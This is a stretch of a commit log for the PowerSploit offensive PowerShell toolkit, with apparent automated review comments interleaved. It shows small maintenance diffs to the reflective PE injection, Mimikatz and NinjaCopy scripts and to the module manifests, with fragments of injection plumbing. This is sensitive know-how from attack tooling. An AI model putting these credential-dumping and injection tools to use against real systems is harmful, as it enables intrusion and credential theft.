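Review bot: The guarded writes `$PEBytes[0] = 0` / `$PEBytes[1] = 0` still modify the caller's array in place — `$PEBytes` here is the script's own parameter and a [Byte[]] argument is bound by reference, not copied — which is presumably the "loading the same PE more than once" failure that the new .PARAMETER DoNotZeroMZ text in this commit's first hunk describes. Copying before the mutation, `$PEBytes = [Byte[]]$PEBytes.Clone()` ahead of the `if`, would remove the side effect for every caller instead of requiring each one to opt out with the switch; at minimum the parameter help should state that -PEBytes is modified in place. The new `if (-not $DoNotZeroMZ) {` also puts the brace on the same line, while Main otherwise uses Allman braces (the following `if ($ExeArgs ...)` context line is continued by a `{` just outside the hunk). Main starts and ends outside the hunk.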
@@ -710,10 +710,13 @@ $RemoteScriptBlock = {
 $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
 $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf
 
- $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
- $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
- $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
+ # NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP
+ if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {
+ $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
+ $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
+ $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
+ }
 
 $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
 $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
diff --git a/Exfiltration/Invoke-Mimikatz.ps1 b/Exfiltration/Invoke-Mimikatz.ps1
index fc8365b..835d7a7 100644
--- a/Exfiltration/Invoke-Mimikatz.ps1
+++ b/Exfiltration/Invoke-Mimikatz.ps1
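Review bot: The version window `-ge 6.0 -and -lt 6.2` now has to agree exactly with whatever guard protects the NtCreateThreadEx call site, which is outside this hunk and not touched by the commit; if the two ever drift, the missing `$Win32Functions.NtCreateThreadEx` member is only discovered at the call (and, where the script's `Set-StrictMode -Version 2` is in effect, as a property-not-found error) rather than at import. Computing the condition once, `$OSVersion = [Environment]::OSVersion.Version` and `$IsVistaOrWin7 = ($OSVersion -ge [Version]'6.0') -and ($OSVersion -lt [Version]'6.2')`, and reusing that variable at both places would keep them in step. The same applies verbatim to the Exfiltration/Invoke-Mimikatz.ps1 hunk that follows, which duplicates this block. $RemoteScriptBlock begins outside the hunk.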
@@ -609,10 +609,13 @@ $RemoteScriptBlock = {
 $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
 $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf
- $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
- $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
- $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
- $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
+ # NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP
+ if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {
+ $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
+ $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
+ $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
+ $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
+ }
 $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
 $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
-- cgit v1.2.3 From 00af1656b2832807eadbc062eee80e21918c0276 Mon Sep 17 00:00:00 2001
From: Matt Graeber Date: Mon, 14 Dec 2015 17:26:33 -0800 Subject: Bugfix #93 Removed the "EndAddress" parameter set since it was never used. This should resolve any parameter set confusion.
--- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 14 +------------- Exfiltration/Invoke-Mimikatz.ps1 | 14 +------------- Exfiltration/Invoke-NinjaCopy.ps1 | 14 +------------- 3 files changed, 3 insertions(+), 39 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1')
diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1
index d164493..4a1d0e8 100644
--- a/CodeExecution/Invoke-ReflectivePEInjection.ps1
+++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1
@@ -912,24 +912,12 @@ $RemoteScriptBlock = {
 [IntPtr]
 $StartAddress,
- [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)]
- [IntPtr]
- $EndAddress,
-
 [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
 [IntPtr]
 $Size
 )
- [IntPtr]$FinalEndAddress = [IntPtr]::Zero
- if ($PsCmdlet.ParameterSetName -eq "Size")
- {
- [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
- }
- else
- {
- $FinalEndAddress = $EndAddress
- }
+ [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
 $PEEndAddress = $PEInfo.EndAddress
diff --git a/Exfiltration/Invoke-Mimikatz.ps1 b/Exfiltration/Invoke-Mimikatz.ps1
index 835d7a7..85cef30 100644
--- a/Exfiltration/Invoke-Mimikatz.ps1
+++ b/Exfiltration/Invoke-Mimikatz.ps1
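Review bot: With the `EndAddress` set removed, the surviving context line `[Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]` names a parameter set that no longer has a sibling and `$PsCmdlet.ParameterSetName` is no longer consulted, so the attribute should be reduced to `[Parameter(Position = 3, Mandatory = $true)]` to make the single-set intent explicit rather than leaving a vestigial set name for the next reader to puzzle over. The new `[IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))` line carries no check that the computed end lies at or above `$StartAddress`; that is presumably unchanged from the old `Size` branch, but a one-line comment stating that `Add-SignedIntAsUnsigned` is relied on for the wrap-around semantics would help. The identical change is repeated in the Invoke-Mimikatz and Invoke-NinjaCopy hunks of this commit. The function's param block opens before this hunk and its body continues after it.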
@@ -802,24 +802,12 @@ $RemoteScriptBlock = {
 [IntPtr]
 $StartAddress,
- [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)]
- [IntPtr]
- $EndAddress,
-
 [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
 [IntPtr]
 $Size
 )
- [IntPtr]$FinalEndAddress = [IntPtr]::Zero
- if ($PsCmdlet.ParameterSetName -eq "Size")
- {
- [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
- }
- else
- {
- $FinalEndAddress = $EndAddress
- }
+ [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
 $PEEndAddress = $PEInfo.EndAddress
diff --git a/Exfiltration/Invoke-NinjaCopy.ps1 b/Exfiltration/Invoke-NinjaCopy.ps1
index 7ff5bfa..36cef8d 100644
--- a/Exfiltration/Invoke-NinjaCopy.ps1
+++ b/Exfiltration/Invoke-NinjaCopy.ps1
@@ -818,24 +818,12 @@ $RemoteScriptBlock = {
 [IntPtr]
 $StartAddress,
- [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)]
- [IntPtr]
- $EndAddress,
-
 [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
 [IntPtr]
 $Size
 )
- [IntPtr]$FinalEndAddress = [IntPtr]::Zero
- if ($PsCmdlet.ParameterSetName -eq "Size")
- {
- [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
- }
- else
- {
- $FinalEndAddress = $EndAddress
- }
+ [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
 $PEEndAddress = $PEInfo.EndAddress
-- cgit v1.2.3 From c2a70924e16cd80a1c07d9de82db893b32a4aba9 Mon Sep 17 00:00:00 2001
From: Matt Graeber Date: Wed, 16 Dec 2015 17:07:39 -0800 Subject: Removed all version numbers from scripts Scripts in a module should not be individually versioned. Only the module should be versioned. --- AntivirusBypass/AntivirusBypass.psd1 | 44 -------------------------- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 5 +-- CodeExecution/Invoke-WmiCommand.ps1 | 2 -- Exfiltration/Get-GPPPassword.ps1 | 1 - Exfiltration/Invoke-CredentialInjection.ps1 | 1 - Exfiltration/Invoke-Mimikatz.ps1 | 14 ++------ Exfiltration/Invoke-NinjaCopy.ps1 | 2 -- Exfiltration/Invoke-TokenManipulation.ps1 | 2 -- Exfiltration/VolumeShadowCopyTools.ps1 | 4 --- PowerSploit.psd1 | 3 +- Recon/Invoke-Portscan.ps1 | 4 --- 11 files changed, 5 insertions(+), 77 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/AntivirusBypass/AntivirusBypass.psd1 b/AntivirusBypass/AntivirusBypass.psd1 index 29949c1..507cfdb 100644 --- a/AntivirusBypass/AntivirusBypass.psd1 +++ b/AntivirusBypass/AntivirusBypass.psd1 @@ -1,5 +1,4 @@ @{ - # Script module or binary module file associated with this manifest. ModuleToProcess = 'AntivirusBypass.psm1' 
@@ -24,39 +23,6 @@ Description = 'PowerSploit Antivirus Avoidance/Bypass Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = '*' @@ -74,14 +40,4 @@ ModuleList = @(@{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID # List of all files packaged with this module FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md' - -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } 
diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 4a1d0e8..990c4b1 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -153,13 +153,10 @@ Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-Refl .LINK -Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection +http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ -Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/ - #> [CmdletBinding()] diff --git a/CodeExecution/Invoke-WmiCommand.ps1 b/CodeExecution/Invoke-WmiCommand.ps1 index c15d478..0c06424 100644 --- a/CodeExecution/Invoke-WmiCommand.ps1 +++ b/CodeExecution/Invoke-WmiCommand.ps1 @@ -1,5 +1,3 @@ -#Requires -Version 2 - function Invoke-WmiCommand { <# .SYNOPSIS diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index ea87de4..768a0d2 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,6 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.4.2 .DESCRIPTION diff --git a/Exfiltration/Invoke-CredentialInjection.ps1 b/Exfiltration/Invoke-CredentialInjection.ps1 index f4357bd..a7b312d 100644 --- a/Exfiltration/Invoke-CredentialInjection.ps1 +++ b/Exfiltration/Invoke-CredentialInjection.ps1 @@ -13,7 +13,6 @@ function Invoke-CredentialInjection License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 1.1 .DESCRIPTION 
diff --git a/Exfiltration/Invoke-Mimikatz.ps1 b/Exfiltration/Invoke-Mimikatz.ps1 index 6934584..c701f63 100644 --- a/Exfiltration/Invoke-Mimikatz.ps1 +++ b/Exfiltration/Invoke-Mimikatz.ps1 @@ -15,9 +15,7 @@ Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. License: http://creativecommons.org/licenses/by/3.0/fr/ Required Dependencies: Mimikatz (included) Optional Dependencies: None -Version: 1.5 -ReflectivePEInjection version: 1.1 -Mimikatz version: 2.0 alpha (2/16/2015) +Mimikatz version: 2.0 alpha (12/14/2015) .DESCRIPTION @@ -62,15 +60,7 @@ Find mimikatz at: http://blog.gentilkiwi.com .LINK -Blog: http://clymb3r.wordpress.com/ -Benjamin DELPY blog: http://blog.gentilkiwi.com - -Github repo: https://github.com/clymb3r/PowerShell -mimikatz Github repo: https://github.com/gentilkiwi/mimikatz - -Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ -Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ - +http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ #> [CmdletBinding(DefaultParameterSetName="DumpCreds")] diff --git a/Exfiltration/Invoke-NinjaCopy.ps1 b/Exfiltration/Invoke-NinjaCopy.ps1 index 36cef8d..15bee1b 100644 --- a/Exfiltration/Invoke-NinjaCopy.ps1 +++ b/Exfiltration/Invoke-NinjaCopy.ps1 @@ -25,8 +25,6 @@ Contributors: This script has a byte array hardcoded, which contains a DLL wich License: GPLv3 or later Required Dependencies: None Optional Dependencies: None -Version: 1.1 -ReflectivePEInjection version: 1.1 .DESCRIPTION diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1 index 90f9d47..3a61da8 100644 --- a/Exfiltration/Invoke-TokenManipulation.ps1 +++ b/Exfiltration/Invoke-TokenManipulation.ps1 
@@ -49,8 +49,6 @@ Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.12 -(1.11 -> 1.12: Simple logic added by Josh M. Bryant to find an unprotected process to grab a SYSTEM token from, rather than hardcoding to wininit, https://www.fixtheexchange.com/) .DESCRIPTION diff --git a/Exfiltration/VolumeShadowCopyTools.ps1 b/Exfiltration/VolumeShadowCopyTools.ps1 index 9d6952e..579dd0e 100644 --- a/Exfiltration/VolumeShadowCopyTools.ps1 +++ b/Exfiltration/VolumeShadowCopyTools.ps1 @@ -10,7 +10,6 @@ function Get-VolumeShadowCopy License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.0.0 #> $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) @@ -35,7 +34,6 @@ function New-VolumeShadowCopy License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.0.0 .DESCRIPTION @@ -121,7 +119,6 @@ function Remove-VolumeShadowCopy License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.0.0 .DESCRIPTION @@ -180,7 +177,6 @@ function Mount-VolumeShadowCopy License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.0.0 .DESCRIPTION diff --git a/PowerSploit.psd1 b/PowerSploit.psd1 index 678294b..0137fd7 100644 --- a/PowerSploit.psd1 +++ b/PowerSploit.psd1 
@@ -41,5 +41,6 @@ ModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUI @{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}, @{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}, @{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}, - @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'} ) + @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}, + @{ModuleName = 'PrivEsc'; ModuleVersion = '1.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'} ) } diff --git a/Recon/Invoke-Portscan.ps1 b/Recon/Invoke-Portscan.ps1 index 99bbb89..6f059e2 100644 --- a/Recon/Invoke-Portscan.ps1 +++ b/Recon/Invoke-Portscan.ps1 @@ -15,10 +15,6 @@ Optional Dependencies: None Does a simple port scan using regular sockets, based (pretty) loosely on nmap -.NOTES - -version .13 - .PARAMETER Hosts Include these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in -- cgit v1.2.3
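Review bot: The added `@{ModuleName = 'PrivEsc'; ModuleVersion = '1.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'}` entry in PowerSploit.psd1 registers a new nested module, which is unrelated to this commit's stated purpose of removing per-script version numbers and is not mentioned in the description. It would be easier to audit as its own commit, or at least called out in the message, since a manifest change alters what `Import-Module PowerSploit` loads. Keeping the `ModuleVersion` values on these entries is consistent with the commit's rule that versions live on modules rather than scripts.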